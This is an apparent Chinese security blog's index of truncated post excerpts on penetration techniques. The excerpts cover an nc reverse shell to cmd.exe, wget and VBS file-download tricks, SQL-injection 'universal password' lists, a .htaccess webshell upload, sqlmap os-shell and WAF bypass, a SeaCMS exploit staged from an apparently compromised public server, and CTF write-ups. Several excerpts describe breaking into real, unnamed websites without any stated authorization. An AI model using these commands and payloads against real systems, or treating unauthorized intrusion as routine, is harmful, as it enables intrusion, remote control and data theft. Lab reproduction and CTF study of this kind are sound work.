新博客

http://hone.cool

2018-03-19 17:20:30

阅读数:66

评论数:0

高版本的udf提权

最近一直在学习技术,虽然过程中遇到了些问题,但都解决了。下面就记录一些吧,给自己老年的时候看,哈哈哈。--怀着一颗低调的心奋发前行。配置环境:phpstudy(mysql5.5.53版本)  2012R2 64位首先访问脚本,是款暗月的mysql全版本通杀提权神器,网上找的。需要输入mysql数据...

2018-02-08 11:41:36

阅读数:1636

评论数:0

通过注入拿下服务器

    首先,碰到了个站。注入漏洞,看一下是不是DBA权限。   当前用户是DBA权限,执行os-shell       可以直接执行命令,但是有时候会卡到链接超时,在执行os-shell的过程中有条信息,就是上面打红的地方(忽略掉打码技术),访问该地址它。     ...

2017-12-28 14:58:49

阅读数:905

评论数:0

CVE-2017-11882复现

目标机:win7 office2013 (192.168.72.129)攻击机:kali (192.168.72.139)利用脚本工具:https://github.com/starnightcyber/CVE-2017-11882复现0x01:使用在上述的工具,生成漏洞的doc文件。python...

2017-11-22 15:23:58

阅读数:373

评论数:0

内网渗透之MSF 路由转发

    如果我已经拿到了一台内网服务器,需要使用MSF去访问内网资源,这时候就需要在msf中添加去往“内网网段”的路由。     MSF跳板实现过程:            需要获得一个msf的session会话;            获取内网地址网段;            在msf中添加”内...

2017-11-22 11:24:22

阅读数:1378

评论数:0

海洋CMS复现

使用环境:肉鸡服务器:103.229.126.201攻击机:win7(192.168.72.130)目标机:win7(192.168.72.129)+(seacms v6.53)POC:POST /seacms/upload/search.php HTTP/1.1Host: 192.168.72....

2017-11-08 14:38:02

阅读数:911

评论数:0

某站登入框存在post注入

验证方法,在账号密码处输入' 如果报错说明有该漏洞存在。用burp抓包,具体怎么做,之前博客里有: http://blog.csdn.net/qq_36512966/article/details/70976527然后用sqlmap跑包。命令为:sqlmap -r “包的地址”如图,成功注入。是s...

2017-09-29 11:13:36

阅读数:540

评论数:0

通过cmd上传文件的方法-debug方法

测试机:xp(32位)工具:exe2bat.exe 位于kali中的 /usr/share/windows-binaries目录原理:将需要上传的程序转换为十六进制hex的形式,然后debug将hex编译还原。如图:执行命令:wine exe2bat.exe ew.exe ew.txt      ...

2017-09-28 11:58:06

阅读数:470

评论数:0

通过cmd上传文件的方法-wget方法

测试机:win2003(win系统都可以,不一一举例)工具:wget.exe用法cmd下wget.exe http://www.xxx.com/xxx -O c:/windows/xxx(本地保存路径)如图:OK,上传成功。其实这个方法比较多余, 因为在拿到shell之后想办法传程序上去,wget...

2017-09-27 17:25:29

阅读数:670

评论数:0

通过cmd上传文件的方法-vbs脚本

测试机:win2003 (win2008 xp 都行,不一一举例了,但是也有局限性,win7以上的大部分版本就运行不成功)很简单,复制粘贴代码即可:cmd下:echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^")...

2017-09-27 16:33:02

阅读数:172

评论数:0

nc的使用

攻击机:kali  192.168.72.128目标机:win2003 192.168.72.131首先在攻击机监听本地端口7777nc -lvvp 77771在目标机上运行nc.exenc.exe 192.168.72.128 7777 -e c:\windows\system32\cmd.ex...

2017-09-27 15:52:17

阅读数:148

评论数:0

ISCC2017 Web write up

一 打开连接: 注意You give me f1ag and I will give you flag too~~~ 这段话有猫腻,没错就是f1ag和flag。 提交f1ag。 出现:哼,就给我一个flag我才不和你换呢。 右...

2017-05-25 13:37:59

阅读数:898

评论数:0

ISCC2017 Misc write up附件题目文件

一 打开附件是个.docx文档,打开是乱码。 改后缀名为.zip 打开发现: 都是.xml配置文件,找到document.xml时出现flag。 二 打开附件是个.pcapng文件。用wireshark打开。发现是个tcp协议,追踪TCP流。 有个key.zip和test...

2017-05-25 13:09:01

阅读数:1324

评论数:0

ISCC2017 Basic write up附加题目文件

Wheel Cipher 身为二战时期的密码专家,你截获了通信员身上的一段密文、密钥序列和加密列表。你能看懂吗? 加密表: 1: 2: 3: 4: 5: 6: 7: 8: 9: 10: 11: 12: 13:   密钥为:2,3,7,5,13,12,9,1,8,10,4,11...

2017-05-25 12:51:13

阅读数:1802

评论数:0

sqlmap的tamper问题

每次日站时,看见安全狗都失望完! 所有接下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号...

2017-05-24 21:28:09

阅读数:532

评论数:0

sqlmap常用命令

-u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,...

2017-05-24 21:05:03

阅读数:157

评论数:0

htaccess文件上传拿shell

1.创建htaccess文件,编辑内容为: SetHandler application/x-httpd-php 然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。 2.编辑内容为:  demo.jpg> ForceType application/x...

2017-05-24 20:50:58

阅读数:2205

评论数:0

渗透之信息收集

在渗透测试开始之前,第一步信息收集,对网站的结构有个初步了解,第二步才是扫目录。 那么,信息收集包括哪方面呢, 主要是:IP地址,端口,脚本类型,搭建环境,whois查询等。 例如目标网站:http://www.bplead.com/ 查询SEO: 可见,权重为0,一般的权重为...

2017-05-24 12:21:30

阅读数:315

评论数:0

后台登入万能密码合集

asp aspx万能密码   1: "or "a"="a    2: ')or('a'='a    3:or 1=1--    4:'or 1=1--    5:a'or' 1=1--    6: "or 1=1--    7...

2017-05-24 11:29:09

阅读数:3139

评论数:0

xss妙用,快速测试xss漏洞。

#介绍# 这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:http://ha.ckers.org/xss.html 。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the...

2017-05-24 11:21:39

阅读数:5521

评论数:0

提示
确定要删除当前文章?
取消 删除
关闭
关闭